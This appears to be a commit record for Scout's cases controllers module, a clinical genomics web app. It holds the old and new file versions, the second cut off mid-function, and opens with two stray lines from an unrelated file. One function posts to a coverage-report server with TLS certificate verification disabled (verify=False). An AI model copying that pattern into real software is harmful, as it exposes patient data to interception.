self._displayToScreen = displayToScreenFunction
class FMBTWindowsError(Exception): pass
|
# -*- coding: utf-8 -*-
import os
import itertools
import requests
import datetime
import logging
from bs4 import BeautifulSoup
from xlsxwriter import Workbook
from flask import url_for, current_app
from flask_mail import Message
import query_phenomizer
from flask_login import current_user
from scout.constants import (CASE_STATUSES, PHENOTYPE_GROUPS, COHORT_TAGS, SEX_MAP, PHENOTYPE_MAP,
CANCER_PHENOTYPE_MAP, VERBS_MAP, MT_EXPORT_HEADER)
from scout.constants.variant_tags import MANUAL_RANK_OPTIONS, DISMISS_VARIANT_OPTIONS, GENETIC_MODELS
from scout.export.variant import export_mt_variants
from scout.server.utils import institute_and_case, user_institutes
from scout.parse.clinvar import clinvar_submission_header, clinvar_submission_lines
from scout.server.blueprints.variant.controllers import variant as variant_decorator
from scout.parse.matchmaker import hpo_terms, omim_terms, genomic_features, parse_matches
from scout.utils.matchmaker import matchmaker_request
from scout.server.blueprints.variant.utils import predictions
from scout.server.blueprints.genes.controllers import gene
LOG = logging.getLogger(__name__)
STATUS_MAP = {'solved': 'bg-success', 'archived': 'bg-warning'}
TRACKS = {
'rare': 'Rare Disease',
'cancer': 'Cancer',
}
def cases(store, case_query, limit=100):
"""Preprocess case objects.
Add the necessary information to display the 'cases' view
Args:
store(adapter.MongoAdapter)
case_query(pymongo.Cursor)
limit(int): Maximum number of cases to display
Returns:
data(dict): includes the cases, how many there are and the limit.
"""
case_groups = {status: [] for status in CASE_STATUSES}
nr_cases = 0
for nr_cases, case_obj in enumerate(case_query.limit(limit),1):
analysis_types = set(ind['analysis_type'] for ind in case_obj['individuals'])
LOG.debug("Analysis types found in %s: %s", case_obj['_id'], ','.join(analysis_types))
if len(analysis_types) > 1:
LOG.debug("Set analysis types to {'mixed'}")
analysis_types = set(['mixed'])
case_obj['analysis_types'] = list(analysis_types)
case_obj['assignees'] = [store.user(user_email) for user_email in
case_obj.get('assignees', [])]
case_obj['is_rerun'] = len(case_obj.get('analyses', [])) > 0
case_obj['clinvar_variants'] = store.case_to_clinVars(case_obj['_id'])
case_obj['display_track'] = TRACKS[case_obj.get('track', 'rare')]
case_groups[case_obj['status']].append(case_obj)
data = {
'cases': [(status, case_groups[status]) for status in CASE_STATUSES],
'found_cases': nr_cases,
'limit': limit,
}
return data
def case(store, institute_obj, case_obj):
"""Preprocess a single case.
Prepare the case to be displayed in the case view.
Args:
store(adapter.MongoAdapter)
institute_obj(models.Institute)
case_obj(models.Case)
Returns:
data(dict): includes the cases, how many there are and the limit.
"""
# Convert individual information to more readable format
case_obj['individual_ids'] = []
for individual in case_obj['individuals']:
try:
sex = int(individual.get('sex', 0))
except ValueError as err:
sex = 0
individual['sex_human'] = SEX_MAP[sex]
pheno_map = PHENOTYPE_MAP
if case_obj.get('track', 'rare') == 'cancer':
pheno_map = CANCER_PHENOTYPE_MAP
individual['phenotype_human'] = pheno_map.get(individual['phenotype'])
case_obj['individual_ids'].append(individual['individual_id'])
case_obj['assignees'] = [store.user(user_email) for user_email in
case_obj.get('assignees', [])]
# Fetch the variant objects for suspects and causatives
suspects = [store.variant(variant_id) or variant_id for variant_id in
case_obj.get('suspects', [])]
causatives = [store.variant(variant_id) or variant_id for variant_id in
case_obj.get('causatives', [])]
# check for partial causatives and associated phenotypes
partial_causatives = []
if case_obj.get('partial_causatives'):
for var_id, values in case_obj['partial_causatives'].items():
causative_obj = {
'variant' : store.variant(var_id) or var_id,
'omim_terms' : values.get('diagnosis_phenotypes'),
'hpo_terms' : values.get('phenotype_terms')
}
partial_causatives.append(causative_obj)
# Set of all unique genes in the default gene panels
distinct_genes = set()
case_obj['panel_names'] = []
for panel_info in case_obj.get('panels', []):
if not panel_info.get('is_default'):
continue
panel_obj = store.gene_panel(panel_info['panel_name'], version=panel_info.get('version'))
distinct_genes.update([gene['hgnc_id'] for gene in panel_obj.get('genes', [])])
full_name = "{} ({})".format(panel_obj['display_name'], panel_obj['version'])
case_obj['panel_names'].append(full_name)
case_obj['default_genes'] = list(distinct_genes)
for hpo_term in itertools.chain(case_obj.get('phenotype_groups', []),
case_obj.get('phenotype_terms', [])):
hpo_term['hpo_link'] = ("http://hpo.jax.org/app/browse/term/{}"
.format(hpo_term['phenotype_id']))
rank_model_link_prefix = current_app.config.get('RANK_MODEL_LINK_PREFIX')
if case_obj.get('rank_model_version'):
rank_model_link_postfix = current_app.config.get('RANK_MODEL_LINK_POSTFIX','')
case_obj['rank_model_link'] = str(rank_model_link_prefix +
case_obj['rank_model_version'] + rank_model_link_postfix)
sv_rank_model_link_prefix = current_app.config.get('SV_RANK_MODEL_LINK_PREFIX')
if case_obj.get('sv_rank_model_version'):
sv_rank_model_link_postfix = current_app.config.get('SV_RANK_MODEL_LINK_POSTFIX','')
case_obj['sv_rank_model_link'] = str(sv_rank_model_link_prefix +
case_obj['sv_rank_model_version'] + sv_rank_model_link_postfix)
# other collaborators than the owner of the case
o_collaborators = []
for collab_id in case_obj.get('collaborators',[]):
if collab_id != case_obj['owner'] and store.institute(collab_id):
o_collaborators.append(store.institute(collab_id))
case_obj['o_collaborators'] = [(collab_obj['_id'], collab_obj['display_name']) for
collab_obj in o_collaborators]
collab_ids = [(collab['_id'], collab['display_name']) for collab in store.institutes() if
(collab['_id'] not in ('cust000', institute_obj['_id'])) and
(collab['_id'] not in case_obj['collaborators'])]
events = list(store.events(institute_obj, case=case_obj))
for event in events:
event['verb'] = VERBS_MAP[event['verb']]
case_obj['clinvar_variants'] = store.case_to_clinVars(case_obj['_id'])
# if updated_at is a list, set it to the last update datetime
if case_obj.get('updated_at') and isinstance(case_obj['updated_at'], list):
case_obj['updated_at'] = max(case_obj['updated_at'])
# Phenotype groups can be specific for an institute, there are some default groups
pheno_groups = institute_obj.get('phenotype_groups') or PHENOTYPE_GROUPS
data = {
'status_class': STATUS_MAP.get(case_obj['status']),
'other_causatives': store.check_causatives(case_obj=case_obj),
'comments': store.events(institute_obj, case=case_obj, comments=True),
'hpo_groups': pheno_groups,
'events': events,
'suspects': suspects,
'causatives': causatives,
'partial_causatives' : partial_causatives,
'collaborators': collab_ids,
'cohort_tags': COHORT_TAGS,
}
return data
def case_report_content(store, institute_obj, case_obj):
"""Gather contents to be visualized in a case report
Args:
store(adapter.MongoAdapter)
institute_obj(models.Institute)
case_obj(models.Case)
Returns:
data(dict)
"""
variant_types = {
'causatives_detailed': 'causatives',
'suspects_detailed': 'suspects',
'classified_detailed': 'acmg_classification',
'tagged_detailed': 'manual_rank',
'dismissed_detailed': 'dismiss_variant',
'commented_detailed': 'is_commented',
}
data = case_obj
for individual in data['individuals']:
try:
sex = int(individual.get('sex', 0))
except ValueError as err:
sex = 0
individual['sex_human'] = SEX_MAP[sex]
individual['phenotype_human'] = PHENOTYPE_MAP.get(individual['phenotype'])
# Add the case comments
data['comments'] = store.events(institute_obj, case=case_obj, comments=True)
data['manual_rank_options'] = MANUAL_RANK_OPTIONS
data['dismissed_options'] = DISMISS_VARIANT_OPTIONS
data['genetic_models'] = dict(GENETIC_MODELS)
data['report_created_at'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M")
evaluated_variants = {vt:[] for vt in variant_types}
# We collect all causatives and suspected variants
# These are handeled in separate since they are on case level
for var_type in ['causatives', 'suspects']:
#These include references to variants
vt = '_'.join([var_type, 'detailed'])
for var_id in case_obj.get(var_type,[]):
variant_obj = store.variant(var_id)
if not variant_obj:
continue
# If the variant exists we add it to the evaluated variants
evaluated_variants[vt].append(variant_obj)
## get variants for this case that are either classified, commented, tagged or dismissed.
for var_obj in store.evaluated_variants(case_id=case_obj['_id']):
# Check which category it belongs to
for vt in variant_types:
keyword = variant_types[vt]
# When found we add it to the categpry
# Eac variant can belong to multiple categories
if keyword not in var_obj:
continue
evaluated_variants[vt].append(var_obj)
for var_type in evaluated_variants:
decorated_variants = []
for var_obj in evaluated_variants[var_type]:
# We decorate the variant with some extra information
decorated_info = variant_decorator(
store=store,
institute_id=institute_obj['_id'],
case_name=case_obj['display_name'],
variant_id=None,
variant_obj=var_obj,
add_case=False,
add_other=False,
get_overlapping=False,
add_compounds=False,
variant_type=var_obj['category'],
institute_obj=institute_obj,
case_obj=case_obj,
)
decorated_variants.append(decorated_info['variant'])
# Add the decorated variants to the case
data[var_type] = decorated_variants
return data
def coverage_report_contents(store, institute_obj, case_obj, base_url):
"""Posts a request to chanjo-report and capture the body of the returned response to include it in case report
Args:
store(adapter.MongoAdapter)
institute_obj(models.Institute)
case_obj(models.Case)
base_url(str): base url of server
Returns:
coverage_data(str): string rendering of the content between <body </body> tags of a coverage report
"""
request_data = {}
# extract sample ids from case_obj and add them to the post request object:
request_data['sample_id'] = [ ind['individual_id'] for ind in case_obj['individuals'] ]
# extract default panel names and default genes from case_obj and add them to the post request object
distinct_genes = set()
panel_names = []
for panel_info in case_obj.get('panels', [ ]):
if panel_info.get('is_default') is False:
continue
panel_obj = store.gene_panel(panel_info['panel_name'], version=panel_info.get('version'))
distinct_genes.update([gene['hgnc_id'] for gene in panel_obj.get('genes', [])])
full_name = "{} ({})".format(panel_obj['display_name'], panel_obj['version'])
panel_names.append(full_name)
panel_names = ' ,'.join(panel_names)
request_data['gene_ids'] = ','.join([str(gene_id) for gene_id in list(distinct_genes)])
request_data['panel_name'] = panel_names
request_data['request_sent'] = datetime.datetime.now()
# add institute-specific cutoff level to the post request object
request_data['level'] = institute_obj.get('coverage_cutoff', 15)
#send get request to chanjo report
#disable default certificate verification
resp = requests.post(base_url+'reports/report', data=request_data, verify=False)
#read response content
soup = BeautifulSoup(resp.text)
# remove links in the printed version of coverage report
for tag in soup.find_all('a'):
tag.replaceWith('')
#extract body content using BeautifulSoup
coverage_data = ''.join(['%s' % x for x in soup.body.contents])
return coverage_data
def clinvar_submissions(store, user_id, institute_id):
"""Get all Clinvar submissions for a user and an institute"""
submissions = list(store.clinvar_submissions(user_id, institute_id))
return submissions
def clinvar_header(submission_objs, csv_type):
""" Call clinvar parser to extract required fields to include in csv header from clinvar submission objects"""
clinvar_header_obj = clinvar_submission_header(submission_objs, csv_type)
return clinvar_header_obj
def clinvar_lines(clinvar_objects, clinvar_header):
""" Call clinvar parser to extract required lines to include in csv file from clinvar submission objects and header"""
clinvar_lines = clinvar_submission_lines(clinvar_objects, clinvar_header)
return clinvar_lines
def mt_excel_files(store, case_obj, temp_excel_dir):
"""Collect MT variants and format line of a MT variant report
to be exported in excel format
Args:
store(adapter.MongoAdapter)
case_obj(models.Case)
temp_excel_dir(os.Path): folder where the temp excel files are written to
Returns:
written_files(int): the number of files written to temp_excel_dir
"""
today = datetime.datetime.now().strftime('%Y-%m-%d')
samples = case_obj.get('individuals')
query = {'chrom':'MT'}
mt_variants = list(store.variants(case_id=case_obj['_id'], query=query, nr_of_variants= -1, sort_key='position'))
written_files = 0
for sample in samples:
sample_id = sample['individual_id']
display_name = sample['display_name']
sample_lines = export_mt_variants(variants=mt_variants, sample_id=sample_id)
# set up document name
document_name = '.'.join([case_obj['display_name'], display_name, today]) + '.xlsx'
workbook = Workbook(os.path.join(temp_excel_dir,document_name))
Report_Sheet = workbook.add_worksheet()
# Write the column header
row = 0
for col,field in enumerate(MT_EXPORT_HEADER):
Report_Sheet.write(row,col,field)
# Write variant lines, after header (start at line 1)
for row, line in enumerate(sample_lines,1): # each line becomes a row in the document
for col, field in enumerate(line): # each field in line becomes a cell
Report_Sheet.write(row,col,field)
workbook.close()
if os.path.exists(os.path.join(temp_excel_dir,document_name)):
written_files += 1
return written_files
def update_synopsis(store, institute_obj, case_obj, user_obj, new_synopsis):
"""Update synopsis."""
# create event only if synopsis was actually changed
if case_obj['synopsis'] != new_synopsis:
link = url_for('cases.case', institute_id=institute_obj['_id'],
case_name=case_obj['display_name'])
store.update_synopsis(institute_obj, case_obj, user_obj, link,
content=new_synopsis)
def hpo_diseases(username, password, hpo_ids, p_value_treshold=1):
"""Return the list of HGNC symbols that match annotated HPO terms.
Args:
username (str): username to use for phenomizer connection
password (str): password to use for phenomizer connection
Returns:
query_result: a generator of dictionaries on the form
{
'p_value': float,
'disease_source': str,
'disease_nr': int,
'gene_symbols': list(str),
'description': str,
'raw_line': str
}
"""
# skip querying Phenomizer unless at least one HPO terms exists
try:
results = query_phenomizer.query(username, password, *hpo_ids)
diseases = [result for result in results
if result['p_value'] <= p_value_treshold]
return diseases
except SystemExit:
return None
def rerun(store, mail, current_user, institute_id, case_name, sender, recipient):
"""Request a rerun by email."""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
user_obj = store.user(current_user.email)
link = url_for('cases.case', institute_id=institute_id, case_name=case_name)
store.request_rerun(institute_obj, case_obj, user_obj, link)
# this should send a JSON document to the SuSy API in the future
html = """
<p>{institute}: {case} ({case_id})</p>
<p>Re-run requested by: {name}</p>
""".format(institute=institute_obj['display_name'],
case=case_obj['display_name'], case_id=case_obj['_id'],
name=user_obj['name'].encode())
# compose and send the email message
msg = Message(subject=("SCOUT: request RERUN for {}"
.format(case_obj['display_name'])),
html=html, sender=sender, recipients=[recipient],
# cc the sender of the email for confirmation
cc=[user_obj['email']])
if recipient:
mail.send(msg)
else:
LOG.error("Cannot send rerun message: no recipient defined in config.")
def update_default_panels(store, current_user, institute_id, case_name, panel_ids):
"""Update default panels for a case."""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
user_obj = store.user(current_user.email)
link = url_for('cases.case', institute_id=institute_id, case_name=case_name)
panel_objs = [store.panel(panel_id) for panel_id in panel_ids]
store.update_default_panels(institute_obj, case_obj, user_obj, link, panel_objs)
def update_clinical_filter_hpo(store, current_user, institute_id, case_name, hpo_clinical_filter):
"""Update HPO clinical filter use for a case."""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
user_obj = store.user(current_user.email)
link = url_for('cases.case', institute_id=institute_id, case_name=case_name)
store.update_clinical_filter_hpo(institute_obj, case_obj, user_obj, link, hpo_clinical_filter)
def vcf2cytosure(store, institute_id, case_name, individual_id):
"""vcf2cytosure CGH file for inidividual."""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
for individual in case_obj['individuals']:
if individual['individual_id'] == individual_id:
individual_obj = individual
return (individual_obj['display_name'], individual_obj['vcf2cytosure'])
def gene_variants(store, variants_query, institute_id, page=1, per_page=50):
"""Pre-process list of variants."""
# We need to call variants_collection.count_documents here
variant_count = variants_query.count()
skip_count = per_page * max(page - 1, 0)
more_variants = True if variant_count > (skip_count + per_page) else False
variant_res = variants_query.skip(skip_count).limit(per_page)
my_institutes = list(inst['_id'] for inst in user_institutes(store, current_user))
variants = []
for variant_obj in variant_res:
# hide other institutes for now
if variant_obj['institute'] not in my_institutes:
LOG.warning("Institute {} not allowed.".format(variant_obj['institute']))
continue
# Populate variant case_display_name
variant_case_obj = store.case(case_id=variant_obj['case_id'])
if not variant_case_obj:
# A variant with missing case was encountered
continue
case_display_name = variant_case_obj.get('display_name')
variant_obj['case_display_name'] = case_display_name
genome_build = variant_case_obj.get('genome_build', '37')
if genome_build not in ['37','38']:
genome_build = '37'
# Update the HGNC symbols if they are not set
variant_genes = variant_obj.get('genes')
if variant_genes is not None:
for gene_obj in variant_genes:
# If there is no hgnc id there is nothin we can do
if not gene_obj['hgnc_id']:
continue
# Else we collect the gene object and check the id
if gene_obj.get('hgnc_symbol') is None or gene_obj.get('description') is None:
hgnc_gene = store.hgnc_gene(gene_obj['hgnc_id'], build=genome_build)
if not hgnc_gene:
continue
gene_obj['hgnc_symbol'] = hgnc_gene['hgnc_symbol']
gene_obj['description'] = hgnc_gene['description']
# Populate variant HGVS and predictions
gene_ids = []
gene_symbols = []
hgvs_c = []
hgvs_p = []
variant_genes = variant_obj.get('genes')
if variant_genes is not None:
functional_annotation = ''
for gene_obj in variant_genes:
hgnc_id = gene_obj['hgnc_id']
gene_symbol = gene(store, hgnc_id)['symbol']
gene_ids.append(hgnc_id)
gene_symbols.append(gene_symbol)
hgvs_nucleotide = '-'
# gather HGVS info from gene transcripts
transcripts_list = gene_obj.get('transcripts')
for transcript_obj in transcripts_list:
if transcript_obj.get('is_canonical') and transcript_obj.get('is_canonical') is True:
hgvs_nucleotide = str(transcript_obj.get('coding_sequence_name'))
hgvs_protein = str(transcript_obj.get('protein_sequence_name'))
hgvs_c.append(hgvs_nucleotide)
hgvs_p.append(hgvs_protein)
if len(gene_symbols) == 1:
if(hgvs_p[0] != "None"):
hgvs = hgvs_p[0]
elif(hgvs_c[0] != "None"):
hgvs = hgvs_c[0]
else:
hgvs = "-"
variant_obj['hgvs'] = hgvs
# populate variant predictions for display
variant_obj.update(predictions(variant_genes))
variants.append(variant_obj)
return {
'variants': variants,
'more_variants': more_variants,
}
def multiqc(store, institute_id, case_name):
"""Find MultiQC report for the case."""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
return dict(
institute=institute_obj,
case=case_obj,
)
def get_sanger_unevaluated(store, institute_id, user_id):
"""Get all variants for an institute having Sanger validations ordered but still not evaluated
Args:
store(scout.adapter.MongoAdapter)
institute_id(str)
Returns:
unevaluated: a list that looks like this: [ {'case1': [varID_1, varID_2, .., varID_n]}, {'case2' : [varID_1, varID_2, .., varID_n]} ],
where the keys are case_ids and the values are lists of variants with Sanger ordered but not yet validated
"""
# Retrieve a list of ids for variants with Sanger ordered grouped by case from the 'event' collection
# This way is much faster than querying over all variants in all cases of an institute
sanger_ordered_by_case = store.sanger_ordered(institute_id, user_id)
unevaluated = []
# for each object where key==case and value==[variant_id with Sanger ordered]
for item in sanger_ordered_by_case:
case_id = item['_id']
# Get the case to collect display name
case_obj = store.case(case_id=case_id)
if not case_obj: # the case might have been removed
continue
case_display_name = case_obj.get('display_name')
# List of variant document ids
varid_list = item['vars']
unevaluated_by_case = {}
unevaluated_by_case[case_display_name] = []
for var_id in varid_list:
# For each variant with sanger validation ordered
variant_obj = store.variant(document_id=var_id, case_id=case_id)
# Double check that Sanger was ordered (and not canceled) for the variant
if variant_obj is None or variant_obj.get('sanger_ordered') is None or variant_obj.get('sanger_ordered') is False:
continue
validation = variant_obj.get('validation', 'not_evaluated')
# Check that the variant is not evaluated
if validation in ['True positive', 'False positive']:
continue
unevaluated_by_case[case_display_name].append(variant_obj['_id'])
# If for a case there is at least one Sanger validation to evaluate add the object to the unevaluated objects list
if len(unevaluated_by_case[case_display_name]) > 0:
unevaluated.append(unevaluated_by_case)
return unevaluated
def mme_add(store, user_obj, case_obj, add_gender, add_features, add_disorders, genes_only,
mme_base_url, mme_accepts, mme_token):
"""Add a patient to MatchMaker server
Args:
store(adapter.MongoAdapter)
user_obj(dict) a scout user object (to be added as matchmaker contact)
case_obj(dict) a scout case object
add_gender(bool) if True case gender will be included in matchmaker
add_features(bool) if True HPO features will be included in matchmaker
add_disorders(bool) if True OMIM diagnoses will be included in matchmaker
genes_only(bool) if True only genes and not variants will be shared
mme_base_url(str) base url of the MME server
mme_accepts(str) request content accepted by MME server
mme_token(str) auth token of the MME server
Returns:
submitted_info(dict) info submitted to MatchMaker and its responses
"""
if not mme_base_url or not mme_accepts or not mme_token:
return 'Please check that Matchmaker connection parameters are valid'
url = ''.join([mme_base_url, '/patient/add'])
features = [] # this is the list of HPO terms
disorders = [] # this is the list of OMIM diagnoses
g_features = []
# create contact dictionary
contact_info = {
'name' : user_obj['name'],
'href' : ''.join( ['mailto:',user_obj['email']] ),
'institution' : 'Scout software user, Science For Life Laboratory, Stockholm, Sweden'
}
if add_features: # create features dictionaries
features = hpo_terms(case_obj)
if add_disorders: # create OMIM disorders dictionaries
disorders = omim_terms(case_obj)
# send a POST request and collect response for each affected individual in case
server_responses = []
submitted_info = {
'contact' : contact_info,
'sex' : add_gender,
'features' : features,
'disorders' : disorders,
'genes_only' : genes_only,
'patient_id' : []
}
for individual in case_obj.get('individuals'):
if not individual['phenotype'] in [2, 'affected']: # include only affected individuals
continue
patient = {
'contact' : contact_info,
'id' : '.'.join([case_obj['_id'], individual.get('individual_id')]), # This is a required field form MME
'label' : '.'.join([case_obj['display_name'], individual.get('display_name')]),
'features' : features,
'disorders' : disorders
}
if add_gender:
if individual['sex'] == '1':
patient['sex'] = 'MALE'
else:
patient['sex'] = 'FEMALE'
if case_obj.get('suspects'):
g_features = genomic_features(store, case_obj, individual.get('display_name'), genes_only)
patient['genomicFeatures'] = g_features
# send add request to server and capture response
resp = matchmaker_request(url=url, token=mme_token, method='POST', content_type=mme_accepts,
accept='application/json', data={'patient':patient})
server_responses.append({
'patient': patient,
'message': resp.get('message'),
'status_code' : resp.get('status_code')
})
submitted_info['server_responses'] = server_responses
return submitted_info
def mme_delete(case_obj, mme_base_url, mme_token):
"""Delete all affected samples for a case from MatchMaker
Args:
case_obj(dict) a scout case object
mme_base_url(str) base url of the MME server
mme_token(str) auth token of the MME server
Returns:
server_responses(list): a list of object of this type:
{
'patient_id': patient_id
'message': server_message,
'status_code': server_status_code
}
"""
server_responses = []
if not mme_base_url or not mme_token:
return 'Please check that Matchmaker connection parameters are valid'
# for each patient of the case in matchmaker
for patient in case_obj['mme_submission']['patients']:
# send delete request to server and capture server's response
patient_id = patient['id']
url = ''.join([mme_base_url, '/patient/delete/', patient_id])
resp = matchmaker_request(url=url, token=mme_token, method='DELETE', )
server_responses.append({
'patient_id': patient_id,
'message': resp.get('message'),
'status_code': resp.get('status_code')
})
return server_responses
def mme_matches(case_obj, institute_obj, mme_base_url, mme_token):
"""Show Matchmaker submission data for a sample and eventual matches.
Args:
case_obj(dict): a scout case object
institute_obj(dict): an institute object
mme_base_url(str) base url of the MME server
mme_token(str) auth token of the MME server
Returns:
data(dict): data to display in the html template
"""
data = {
'institute' : institute_obj,
'case' : case_obj,
'server_errors' : []
}
matches = {}
# loop over the submitted samples and get matches from the MatchMaker server
if not case_obj.get('mme_submission'):
return None
for patient in case_obj['mme_submission']['patients']:
patient_id = patient['id']
matches[patient_id] = None
url = ''.join([ mme_base_url, '/matches/', patient_id])
server_resp = matchmaker_request(url=url, token=mme_token, method='GET')
if 'status_code' in server_resp: # the server returned a valid response
# and this will be a list of match objects sorted by desc date
pat_matches = []
if server_resp.get('matches'):
pat_matches = parse_matches(patient_id, server_resp['matches'])
matches[patient_id] = pat_matches
else:
LOG.warning('Server returned error message: {}'.format(server_resp['message']))
data['server_errors'].append(server_resp['message'])
data['matches'] = matches
return data
def mme_match(case_obj, match_type, mme_base_url, mme_token, nodes=None, mme_accepts=None):
"""Initiate a MatchMaker match against either other Scout patients or external nodes
Args:
case_obj(dict): a scout case object already submitted to MME
match_type(str): 'internal' or 'external'
mme_base_url(str): base url of the MME server
mme_token(str): auth token of the MME server
mme_accepts(str): request content accepted by MME server (only for internal matches)
Returns:
matches(list): a list of eventual matches
"""
query_patients = []
server_responses = []
url = None
# list of patient dictionaries is required for internal matching
query_patients = case_obj['mme_submission']['patients']
if match_type=='internal':
url = ''.join([mme_base_url,'/match'])
for patient in query_patients:
json_resp = matchmaker_request(url=url, token=mme_token, method='POST',
content_type=mme_accepts, accept=mme_accepts, data={'patient':patient})
resp_obj = {
'server' : 'Local MatchMaker node',
'patient_id' : patient['id'],
'results' : json_resp.get('results'),
'status_code' : json_resp.get('status_code'),
'message' : json_resp.get('message') # None if request was successful
}
server_responses.append(resp_obj)
else: # external matching
# external matching requires only patient ID
query_patients = [ patient['id'] for patient in query_patients]
node_ids = [ node['id'] for node in nodes ]
if match_type in node_ids: # match is against a specific external node
node_ids = [match_type]
# Match every affected patient
for patient in query_patients:
# Against every node
for node in node_ids:
url = ''.join([mme_base_url,'/match/external/', patient, '?node=', node])
json_resp = matchmaker_request(url=url, token=mme_token, method='POST')
resp_obj = {
'server' : node,
'patient_id' : patient,
'results' : json_resp.get('results'),
'status_code' : json_resp.get('status_code'),
'message' : json_resp.get('message') # None if request was successful
}
server_responses.append(resp_obj)
return server_responses
Update scout/server/blueprints/cases/controllers.py
Co-Authored-By: Daniel Nilsson <5ebb189bec086108d5ed5e608cd0d69010652678@gmail.com>
# -*- coding: utf-8 -*-
import os
import itertools
import requests
import datetime
import logging
from bs4 import BeautifulSoup
from xlsxwriter import Workbook
from flask import url_for, current_app
from flask_mail import Message
import query_phenomizer
from flask_login import current_user
from scout.constants import (CASE_STATUSES, PHENOTYPE_GROUPS, COHORT_TAGS, SEX_MAP, PHENOTYPE_MAP,
CANCER_PHENOTYPE_MAP, VERBS_MAP, MT_EXPORT_HEADER)
from scout.constants.variant_tags import MANUAL_RANK_OPTIONS, DISMISS_VARIANT_OPTIONS, GENETIC_MODELS
from scout.export.variant import export_mt_variants
from scout.server.utils import institute_and_case, user_institutes
from scout.parse.clinvar import clinvar_submission_header, clinvar_submission_lines
from scout.server.blueprints.variant.controllers import variant as variant_decorator
from scout.parse.matchmaker import hpo_terms, omim_terms, genomic_features, parse_matches
from scout.utils.matchmaker import matchmaker_request
from scout.server.blueprints.variant.utils import predictions
from scout.server.blueprints.genes.controllers import gene
LOG = logging.getLogger(__name__)
STATUS_MAP = {'solved': 'bg-success', 'archived': 'bg-warning'}
TRACKS = {
'rare': 'Rare Disease',
'cancer': 'Cancer',
}
def cases(store, case_query, limit=100):
"""Preprocess case objects.
Add the necessary information to display the 'cases' view
Args:
store(adapter.MongoAdapter)
case_query(pymongo.Cursor)
limit(int): Maximum number of cases to display
Returns:
data(dict): includes the cases, how many there are and the limit.
"""
case_groups = {status: [] for status in CASE_STATUSES}
nr_cases = 0
for nr_cases, case_obj in enumerate(case_query.limit(limit),1):
analysis_types = set(ind['analysis_type'] for ind in case_obj['individuals'])
LOG.debug("Analysis types found in %s: %s", case_obj['_id'], ','.join(analysis_types))
if len(analysis_types) > 1:
LOG.debug("Set analysis types to {'mixed'}")
analysis_types = set(['mixed'])
case_obj['analysis_types'] = list(analysis_types)
case_obj['assignees'] = [store.user(user_email) for user_email in
case_obj.get('assignees', [])]
case_obj['is_rerun'] = len(case_obj.get('analyses', [])) > 0
case_obj['clinvar_variants'] = store.case_to_clinVars(case_obj['_id'])
case_obj['display_track'] = TRACKS[case_obj.get('track', 'rare')]
case_groups[case_obj['status']].append(case_obj)
data = {
'cases': [(status, case_groups[status]) for status in CASE_STATUSES],
'found_cases': nr_cases,
'limit': limit,
}
return data
def case(store, institute_obj, case_obj):
"""Preprocess a single case.
Prepare the case to be displayed in the case view.
Args:
store(adapter.MongoAdapter)
institute_obj(models.Institute)
case_obj(models.Case)
Returns:
data(dict): includes the cases, how many there are and the limit.
"""
# Convert individual information to more readable format
case_obj['individual_ids'] = []
for individual in case_obj['individuals']:
try:
sex = int(individual.get('sex', 0))
except ValueError as err:
sex = 0
individual['sex_human'] = SEX_MAP[sex]
pheno_map = PHENOTYPE_MAP
if case_obj.get('track', 'rare') == 'cancer':
pheno_map = CANCER_PHENOTYPE_MAP
individual['phenotype_human'] = pheno_map.get(individual['phenotype'])
case_obj['individual_ids'].append(individual['individual_id'])
case_obj['assignees'] = [store.user(user_email) for user_email in
case_obj.get('assignees', [])]
# Fetch the variant objects for suspects and causatives
suspects = [store.variant(variant_id) or variant_id for variant_id in
case_obj.get('suspects', [])]
causatives = [store.variant(variant_id) or variant_id for variant_id in
case_obj.get('causatives', [])]
# check for partial causatives and associated phenotypes
partial_causatives = []
if case_obj.get('partial_causatives'):
for var_id, values in case_obj['partial_causatives'].items():
causative_obj = {
'variant' : store.variant(var_id) or var_id,
'omim_terms' : values.get('diagnosis_phenotypes'),
'hpo_terms' : values.get('phenotype_terms')
}
partial_causatives.append(causative_obj)
# Set of all unique genes in the default gene panels
distinct_genes = set()
case_obj['panel_names'] = []
for panel_info in case_obj.get('panels', []):
if not panel_info.get('is_default'):
continue
panel_obj = store.gene_panel(panel_info['panel_name'], version=panel_info.get('version'))
distinct_genes.update([gene['hgnc_id'] for gene in panel_obj.get('genes', [])])
full_name = "{} ({})".format(panel_obj['display_name'], panel_obj['version'])
case_obj['panel_names'].append(full_name)
case_obj['default_genes'] = list(distinct_genes)
for hpo_term in itertools.chain(case_obj.get('phenotype_groups', []),
case_obj.get('phenotype_terms', [])):
hpo_term['hpo_link'] = ("http://hpo.jax.org/app/browse/term/{}"
.format(hpo_term['phenotype_id']))
rank_model_link_prefix = current_app.config.get('RANK_MODEL_LINK_PREFIX')
if case_obj.get('rank_model_version'):
rank_model_link_postfix = current_app.config.get('RANK_MODEL_LINK_POSTFIX','')
case_obj['rank_model_link'] = str(rank_model_link_prefix +
case_obj['rank_model_version'] + rank_model_link_postfix)
sv_rank_model_link_prefix = current_app.config.get('SV_RANK_MODEL_LINK_PREFIX','')
if case_obj.get('sv_rank_model_version'):
sv_rank_model_link_postfix = current_app.config.get('SV_RANK_MODEL_LINK_POSTFIX','')
case_obj['sv_rank_model_link'] = str(sv_rank_model_link_prefix +
case_obj['sv_rank_model_version'] + sv_rank_model_link_postfix)
# other collaborators than the owner of the case
o_collaborators = []
for collab_id in case_obj.get('collaborators',[]):
if collab_id != case_obj['owner'] and store.institute(collab_id):
o_collaborators.append(store.institute(collab_id))
case_obj['o_collaborators'] = [(collab_obj['_id'], collab_obj['display_name']) for
collab_obj in o_collaborators]
collab_ids = [(collab['_id'], collab['display_name']) for collab in store.institutes() if
(collab['_id'] not in ('cust000', institute_obj['_id'])) and
(collab['_id'] not in case_obj['collaborators'])]
events = list(store.events(institute_obj, case=case_obj))
for event in events:
event['verb'] = VERBS_MAP[event['verb']]
case_obj['clinvar_variants'] = store.case_to_clinVars(case_obj['_id'])
# if updated_at is a list, set it to the last update datetime
if case_obj.get('updated_at') and isinstance(case_obj['updated_at'], list):
case_obj['updated_at'] = max(case_obj['updated_at'])
# Phenotype groups can be specific for an institute, there are some default groups
pheno_groups = institute_obj.get('phenotype_groups') or PHENOTYPE_GROUPS
data = {
'status_class': STATUS_MAP.get(case_obj['status']),
